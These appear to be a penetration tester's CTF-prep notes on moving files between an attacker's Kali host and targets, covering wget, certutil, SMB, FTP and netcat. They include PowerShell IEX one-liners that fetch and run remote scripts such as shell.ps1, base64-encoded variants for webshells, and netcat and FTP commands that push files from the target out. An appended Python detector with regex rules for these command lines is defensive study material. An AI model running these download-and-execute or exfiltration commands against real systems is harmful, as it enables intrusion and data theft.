# Linux Download

- base64 encoding
```bash
cat <file_name> | base64 -w 0; echo   # output encoded base64 string to stdout
cat <file_name> | base64 -w 0 > file.out
```
- base64 decoding
```bash
echo -n '<encoded_string>' | base64 -d > file.out
```
- `wget` and `curl`
```bash
wget http://<Kali_ip>:<port>/<file> -O file.out
curl http://<Kali_ip>:<port>/<file> -o file.out
```

---

# Windows Download

- base64 decoding
```powershell
[IO.File]::WriteAllBytes("C:\Users\Public\<file_name>", [Convert]::FromBase64String("<string>"))
```
- `iwr`
```powershell
iwr http://<Kali_ip>:<port>/<file> -usebasicparsing
iwr -uri "http://<Kali_ip>:<port>/<file>" -outfile file.out
```
- `iex (iwr)`
```powershell
# -outfile writes to disk and returns nothing, so it is not used with IEX
IEX (IWR -uri "http://<Kali_ip>:<port>/<file>" -usebasicparsing)
# bash, run on Kali: encode the one-liner as UTF-16LE base64
echo "IEX (IWR http://10.10.14.197:8000/shell.ps1)" | iconv -t utf-16le | base64 -w 0 #great for webshells or POST requests
powershell.exe -Command IEX (IWR http://<Kali_ip>:<port>/<file>)
powershell -c "IEX (iwr http://<Kali_ip>:<port>/<file> -usebasicparsing)"
powershell IEX (iwr -uri 'http://<Kali_ip>:<port>/<file>')
powershell -c "iwr http://<Kali_ip>:<port>/<file> -usebasicparsing | IEX"
```
- `certutil.exe`
```cmd
certutil.exe -urlcache -split -f http://<Kali_ip>:<port>/<in.file> file.out
```
- `New-Object Net.WebClient`
```powershell
# DownloadFile takes (url, destination); DownloadString takes only the url
(New-Object Net.WebClient).DownloadFile('http://<Kali_ip>/tool.exe','tool.exe')
```
- `iex (New-Object Net.WebClient)`
```powershell
IEX(New-Object Net.WebClient).DownloadString('http://<Kali_ip>/tool.exe')
# bash, run on Kali: encode the one-liner as UTF-16LE base64
echo "IEX(New-Object Net.WebClient).DownloadString('http://<Kali_ip>/tool.exe')" | iconv -t utf-16le | base64 -w 0 #great for webshells or POST requests
powershell.exe -Command IEX (New-Object Net.WebClient).DownloadString('http://<Kali_ip>/tool.exe')
powershell -c "IEX ((New-Object Net.WebClient).DownloadString('http://<Kali_ip>/tool.exe'))"
powershell IEX ((New-Object Net.WebClient).DownloadString('http://<Kali_ip>/tool.exe'))
```
- `curl`
```powershell
# curl.exe bypasses the Invoke-WebRequest alias in Windows PowerShell, where -o is ambiguous
curl.exe http://<Kali_ip>:<port>/<file> -o file.out
```
- `wget`
```powershell
wget "http://<Kali_ip>:<port>/<file>" -outfile file.out
```

---

# `scp`

- Move file from Kali to target
	- See [[6 - CTFS/CPTS Prep/MEDIA (HTB)|MEDIA (HTB)]]
```bash
scp /opt/winPEASx64.exe [email protected]:/users/enox/desktop/winpeas.exe
```
- Move file from target back to Kali
```bash
scp [email protected]:/users/enox/desktop/results.txt ~/Documents/htb/boxes/media/results.txt
```

---

# HTTP Server

- Set up an HTTP server to pull files from Kali
```bash
python3 -m http.server <port> #hosts current working dir
```

---

# SMB SERVER

- Set up an SMB server to push files to Kali and to pull files from Kali
```bash
sudo impacket-smbserver share -smb2support . #hosts current working dir
```
- Pull file from Kali down to WIN
```cmd
copy \\<kali_host_ip>\share\nc.exe
```
- Push file from WIN to Kali
```cmd
move <target_file> \\<kali_host_ip>\share
```

---

# FTP Server

## Pull

- Set up an FTP server for pulling files from Kali
```bash
sudo python3 -m pyftpdlib --port 21 #hosts current working dir
```
- Download file from Kali using PowerShell
```powershell
(New-Object Net.WebClient).DownloadFile('ftp://<kali_host_ip>/<target_file>.txt', 'C:\Users\Public\<output_file>.txt')
```

## Push

- Set up an FTP server for pushing files to Kali
```bash
sudo python3 -m pyftpdlib --port 21 --write
```
- Upload file to Kali using PowerShell
```powershell
(New-Object Net.WebClient).UploadFile('ftp://<kali_host_ip>:21/<dest_filename>', 'C:\<path>\<target_file>')
```

---

# Netcat

## Listener on Kali

### Push

- Set up a listener on Kali and redirect its output to a file
```bash
nc -lnvp 9001 -q 3 > /tmp/got-the-file
```
- Connect to listener and push file to Kali
```bash
nc -q 3 -nv Kali_IP 9001 < /path/to/file
```

### Pull

- Set up a listener on Kali and feed it the file as input
```bash
nc -lnvp 9001 -q 3 < /tmp/input-file
```
- Connect to listener and pull down file from Kali
```bash
nc -q 3 -nv Kali_IP 9001 > /tmp/got-the-file
```

## Listener on Target

### Push

- Set up a listener on the target and feed it the file as input
```bash
nc -q 3 -lnvp 55555 < /path/to/file &
```
- Connect to listener and pull down file from target
```bash
nc -nv target-ip 55555 -q 3 > /tmp/got-the-file
```
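
Seen from the monitoring side, the one-liners in the Windows Download section leave recognizable process command lines. The following is an added example, not part of the original notes: a small Python classifier whose rule names, helper names and sample events are all constructed here. It also decodes the UTF-16LE base64 form produced by the `iconv | base64` lines, which is the format PowerShell's `-EncodedCommand` parameter accepts.

```python
import base64
import re

# Rules derived from the Windows download commands on this page (names are made up).
RULES = {
    "certutil-urlcache": re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://", re.I),
    "webclient-download": re.compile(r"net\.webclient\b.*\.download(string|file)\s*\(", re.I),
    # curl and wget are Invoke-WebRequest aliases in Windows PowerShell 5.1
    "iwr-remote": re.compile(r"\b(iwr|invoke-webrequest|wget|curl)\b.*https?://", re.I),
    "iex-remote": re.compile(
        r"\b(iex|invoke-expression)\b.*https?://|https?://.*\|\s*(iex|invoke-expression)\b", re.I),
}
# A parameter starting with "e" followed by a base64-looking argument.
ENC_ARG = re.compile(r"\s-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded payload of -EncodedCommand (or -ec, or any prefix), else None."""
    for m in ENC_ARG.finditer(cmdline):
        flag = m.group(1).lower()
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue
        try:
            return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except ValueError:  # bad base64 or bad UTF-16: not an encoded command
            continue
    return None

def classify(cmdline):
    """Return the sorted rule names hit by a command line or its decoded payload."""
    decoded = decode_encoded_command(cmdline)
    texts = [cmdline, decoded] if decoded else [cmdline]
    return sorted({name for name, rx in RULES.items() for t in texts if rx.search(t)})

def _enc(script):
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed process-creation command lines (192.0.2.0/24 is a documentation range).
SAMPLES = [
    "certutil.exe -urlcache -split -f http://192.0.2.10:8000/in.bin file.out",
    'powershell -c "IEX (iwr http://192.0.2.10:8000/a.ps1 -usebasicparsing)"',
    "powershell.exe -NoProfile -enc " + _enc("IEX (IWR http://192.0.2.10:8000/a.ps1)"),
    "powershell -c \"(New-Object Net.WebClient).DownloadFile('http://192.0.2.10/t.bin','t.bin')\"",
    "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "certutil.exe -hashfile C:\\Temp\\setup.exe SHA256",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or ["-"], line[:70])
```

The `iwr-remote` rule also fires on routine administrative downloads, so in practice it is paired with an allowlist of expected hosts or parent processes.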